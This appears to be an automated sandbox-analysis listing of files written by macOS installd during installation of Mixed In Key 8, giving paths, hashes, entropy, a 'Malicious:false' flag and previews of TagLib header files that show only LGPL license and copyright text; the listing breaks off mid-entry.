                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_6TL4xV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):10981
                                                                                                    Entropy (8bit):4.399905988703116
                                                                                                    Encrypted:false
                                                                                                    MD5:3D164E5473CB05E419731481982FEDB8
                                                                                                    SHA1:3ED4496B8C9B56C0C388FE0B267CF2D6189806A9
                                                                                                    SHA-256:2AB182DE9D1BE5E2C26D63887057E16F760E03B1538ED5BC5CD0D747BFB3A948
                                                                                                    SHA-512:40CC53BB9B212A7FF2668F7360872338E1EEADB8D918B0AFABA2D14A23E2521C20C66B57E71F8D2333F3B9FD55FD84B52CF8169A6E8E5511C0DB6CEE486AB883
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_7EPDpE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3052
                                                                                                    Entropy (8bit):4.337980761263327
                                                                                                    Encrypted:false
                                                                                                    MD5:06A8A2F38E81963831167BDBAC72C6DC
                                                                                                    SHA1:5C9D89503F7AEBCE0CFF3C2B047A2EA29DB8EC95
                                                                                                    SHA-256:6350F759FE401032E10C6488CED557D22FD80C8416BA370FFC288B45A41C1BBC
                                                                                                    SHA-512:842DB741404C2EBB34621261755323739DC7D74D10227F296780419BF443915FD75E7AF1C655CBA58EE1AF015D8420AF6D2CF0C8252C27BE13919C86FD343C08
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2013 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_89UblS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7084
                                                                                                    Entropy (8bit):4.455538740266144
                                                                                                    Encrypted:false
                                                                                                    MD5:00FD0878A55B1E1E9985AE65CFB782A9
                                                                                                    SHA1:74F1CB79213A0EE655BD827E77C90F54CDE2095D
                                                                                                    SHA-256:1ED2A1E1B6EA181F3CB86EB556D9C2755037A4C0DE43C8B3B47686106508384E
                                                                                                    SHA-512:A1C0F4123059B158FF593C32E43C3874BA2EA5C67CE505B59B5E37643386579E15B4D30C7E0C70E39F0C49D92BC01D7C40CA47F269CD523EFB1E7FA42EE74C82
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_8pHV87
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):5037
                                                                                                    Entropy (8bit):4.281544831046047
                                                                                                    Encrypted:false
                                                                                                    MD5:B33EBF6861E3AE3B17BC123726B3D27B
                                                                                                    SHA1:F3AE14BAA11292D16C29FD47E5944372F78DD733
                                                                                                    SHA-256:092E00732A0E294892AD599B6E0D60D10CCC3E071FBA8B66DD68CB8696D3B030
                                                                                                    SHA-512:F154571F83A283DD85246270E68A59D9802FCBB94456B0CD5B04479D431CACBB4A04F9DD5263E2B1759964EDD2DE4138CD65794F8BD5A99F73A9E101065CFA94
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_9SuRGK
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3637
                                                                                                    Entropy (8bit):4.345992187552828
                                                                                                    Encrypted:false
                                                                                                    MD5:761D5D4C6C79A649882E093E5C9DFD72
                                                                                                    SHA1:0620664929E8107434E078E6077D6B9D3DB81598
                                                                                                    SHA-256:7DDA0B385865C6DD08BEEA56DA568B882B2886F9D7E1EDF5EC69332C702AB78D
                                                                                                    SHA-512:32089FD746820899E7659DA4FD6543AED9810F6A07AAB78F6B0A150F5EDB975E22C24F3ECDC85380E3367B3EF81823EF2C8585938288A965B5077160D9789593
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_9dk0GU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3904
                                                                                                    Entropy (8bit):4.252279263145623
                                                                                                    Encrypted:false
                                                                                                    MD5:3A6565839027572D57F6B91E66EF7534
                                                                                                    SHA1:E2A401D9B20B0D36544CF0374743606A31BE5426
                                                                                                    SHA-256:93CD35F0CE23A37FD14DEFC00976F41B8F2E35FE85F9D49EB48D6A6EFF29BFAA
                                                                                                    SHA-512:5BD946D2CD62E2CAC9D4AE8F1470AC05FAFF084213C6691F0627FF1808CFD89AD6292E6E3A327BD761467E04E0465B71C14B10C69100E20FF5BDC718CF3113D9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2008 by Lukas Lalinsky. email : lalinsky@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_9xJQt8
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):2814
                                                                                                    Entropy (8bit):4.31428471845395
                                                                                                    Encrypted:false
                                                                                                    MD5:937F68EFFE0120038B2713D7280C7935
                                                                                                    SHA1:97AB599AA279B2957C9C9ECFD798DF592BA69E91
                                                                                                    SHA-256:A2753C3FEEDC4F8FB56C7978298C0EF0449149A38116CE82D5120BA30DF323D2
                                                                                                    SHA-512:55E9647F3680C23DB11EA06CABFF6B1F6C75C41B075EF0074B1C860493BD7D23EF53AD42E2BBD01CFF9EFD5166FA8E31CE2A149E955E7A90E398888BFE5E3750
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_BYvC0z
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6225
                                                                                                    Entropy (8bit):4.312701111887273
                                                                                                    Encrypted:false
                                                                                                    MD5:968162F46BEBC3DDAD08EA2A2F75E21B
                                                                                                    SHA1:C470750B3F43EAEE7BC35B3B7BF056385F76DEB7
                                                                                                    SHA-256:950B66B9F8A4FBF9EF462A2F0D6B4669E3D2B20AA22628C0E96E6D43F0927E3A
                                                                                                    SHA-512:20A35F84D81E87DE1B0D2AFFA8B6C52C3BAE14953AA6C64D804BE22C50262960E8B337277D7D5235851F51B69BBC1CDA299F4AE925D88D50DBC48D18766B3B9C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2014 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_BhwBYq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):2817
                                                                                                    Entropy (8bit):4.276807317676327
                                                                                                    Encrypted:false
                                                                                                    MD5:34F23C6F70D857E9589587A5971996F6
                                                                                                    SHA1:6C4E4610057F61622E30E83BEAFC37C7AD7B70C9
                                                                                                    SHA-256:E283B4533474AA0DAA3297CD85926F8F473DCD8452506EDE8CFDCB5B7707DC72
                                                                                                    SHA-512:510F096AB0D3FE53B04A11796BAC04B01BFAF0BC8185EE6968E15BED30B46CB84E42389BA2892E79D07952C2A9C206AD98590F7EF6D22AEA544C1D6A2E3590E2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2009 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_DzPkJ1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):9158
                                                                                                    Entropy (8bit):4.411832093027697
                                                                                                    Encrypted:false
                                                                                                    MD5:07C8D047941F80C65A108E47FF2CF227
                                                                                                    SHA1:620E0016FC7B6EC620A3FCDA187492340F73BAAD
                                                                                                    SHA-256:24DBA6F5FE252CA1F0FE6BCB54F069CFD5FCDA8FCB8521E0DD0620DAB8FCDBC1
                                                                                                    SHA-512:0380D8284EF88BAD935A6F5C2D6734B31789D90EF173F3AAB0363CC50451C418AAEE52F190B7C67CE2BD89A79ED1AF2060D6F886AFF2F18AEDC1D9B1B8FDD882
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_FPBuTy
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):10265
                                                                                                    Entropy (8bit):4.394600447993459
                                                                                                    Encrypted:false
                                                                                                    MD5:E2A0B995B271B54A662A8918BA80B695
                                                                                                    SHA1:8F5BF927C587D3AA7AA07AD23BF25A84E9EE4507
                                                                                                    SHA-256:79ABB2AE9B46B27183B735AD0590E7A9753EDA849CAD0AAB1C4E93C51D0B8167
                                                                                                    SHA-512:D74004001916D6DDEEC26D593E12DAB1A6EBE02535C1DB755277FEB3E59727DE52B303733F7F31183DF90F50A870757F01F55A79A53239914E29F77011267BB9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_FXcLwT
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3044
                                                                                                    Entropy (8bit):4.341833924797261
                                                                                                    Encrypted:false
                                                                                                    MD5:333718684CA3B56416EF83E6FA43E4B2
                                                                                                    SHA1:20F1BD136EA0220563FC9E5A73294684ECA082F9
                                                                                                    SHA-256:8C8A4F77D130814CD9EDB13F28F7490004996EEA3F20CACA6D2D5FC3CF506702
                                                                                                    SHA-512:546CFEC439125D4E0F8C7244088CD07ADD8D30CD6BCB4BC5535C0B4998AFF5EAA444899576C21BD6619FE62DDEC036AEF9D685995FEF0093F08E533F3108F545
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_GMaSWQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4019
                                                                                                    Entropy (8bit):4.802242200269514
                                                                                                    Encrypted:false
                                                                                                    MD5:E26416AC9EF68473422B94F064352C53
                                                                                                    SHA1:11E606A9B79D3750A02F87DDA4DEF5D995346405
                                                                                                    SHA-256:0A6F053041743797AF57A60A1CD951B2B568296768FE94FF45C3B0441B85D43C
                                                                                                    SHA-512:8AA1F1732DF180FED0437576414859A860743427B4503214C3B80E9C2E8FA90E6CD10E4AD2C5EBADD459BE28C50A0327E14B30A0C8F313967C0E1C570161A448
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2013 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_GPnYsu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4407
                                                                                                    Entropy (8bit):4.351607386877128
                                                                                                    Encrypted:false
                                                                                                    MD5:8D53C1CEFD843120B38CDB2FEE2A2113
                                                                                                    SHA1:3B99E138781E1FBE5608F04F2696F18BA455627F
                                                                                                    SHA-256:0F26D7CA5FD39E67BE4F006923CC50DB05739FC5E1CFF83E7D6DF2934BA58E29
                                                                                                    SHA-512:CDD29E4A249E9E1194C079FC3B4CE9A420ED67B249BC1DFA6B8914E6C20372CD452C5ED98EC1CDE64CE2745DEA67C4FA0C5825B594637E0E6478A30F2597B81A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HWLXae
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5886
                                                                                                    Entropy (8bit):4.39132784557351
                                                                                                    Encrypted:false
                                                                                                    MD5:365E9E023441582C5C0E096501FCEC17
                                                                                                    SHA1:02A4AD2036857ADE3E313080E5ED55E6D6F4D0AC
                                                                                                    SHA-256:7F66D695B9F98165378DBDCFD09B11649F68DFD02075C4184F13C72D3D80335D
                                                                                                    SHA-512:C18A1C46EF75EDA2F6EE84A6336DACD0389CDE9D922D9DB9575AEBA16FDE75E31CFBC2EC32D15825A05B5C30CCA92518FDBF92490C0E6CA84B1A3A8DD33EAA84
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_IEc6ZJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7498
                                                                                                    Entropy (8bit):4.344419838426909
                                                                                                    Encrypted:false
                                                                                                    MD5:5183A9B294DD23F5A7BC17144CA2B91F
                                                                                                    SHA1:0052672CE3219153094B1246C896A1826979DCF7
                                                                                                    SHA-256:F7232DEFB76520CEC686BE74D96A4B93FC34C00750E2B38928BCCBD5DACF8369
                                                                                                    SHA-512:E93DF04FE7A001BB15992D2715A24510EA755D268AD03D8AEBBED36D10E868771E46AA66BAB04CED9B1FC5B096CA24C7C5DDA31D1F43A34EE6FE79EB1466ED8E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_IY7EJ8
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):8240
                                                                                                    Entropy (8bit):4.257275090052181
                                                                                                    Encrypted:false
                                                                                                    MD5:9E290B3FD3CCA85F505BA036EE2F4447
                                                                                                    SHA1:BC7B2189507F3C144606A5960EC646CD35A2A893
                                                                                                    SHA-256:76CCAE7F8D7C166A773C87FD2EF2C4688F88F23CBB1E12C4A47AA26B87A9E9E1
                                                                                                    SHA-512:6F0C7947F39AAB1BF145230AFACDB782E3989565251B7BE01B43AEE36F0A83640320CDFBA5AE6D32C7705273AEE6865D3764F89DE4F2AA51F51B6CE54D8D71F1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Iy9uMA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4522
                                                                                                    Entropy (8bit):4.288665085440816
                                                                                                    Encrypted:false
                                                                                                    MD5:D04FD0F99759F5EF46A2489A18846601
                                                                                                    SHA1:0860B190EA7CE2821E990A06F57AE63570A90D10
                                                                                                    SHA-256:5ED7218BCCAC1DD30793968C65C18E950C8CFE4E7DD809E0B65F7BBDC0C09A11
                                                                                                    SHA-512:9F73012215E9AC270A3F32D7AD1B8B69E54592826985E4774821659E3104DE81C5844FBB82234225628011E66E802E6E3873C39FC0323928B05DA4E892DEC917
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_J7lPse
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):2863
                                                                                                    Entropy (8bit):4.335270998280833
                                                                                                    Encrypted:false
                                                                                                    MD5:A3EEF9D704DCF5075AFC92358A6E07B5
                                                                                                    SHA1:4186DCDA26FF431F601901AD62A2B3A0AA961D7F
                                                                                                    SHA-256:05ED2DCAAF8DF2DBDD4B5CEB80B105BEBDEBA8A4B5A66D607C445CC50616E3EF
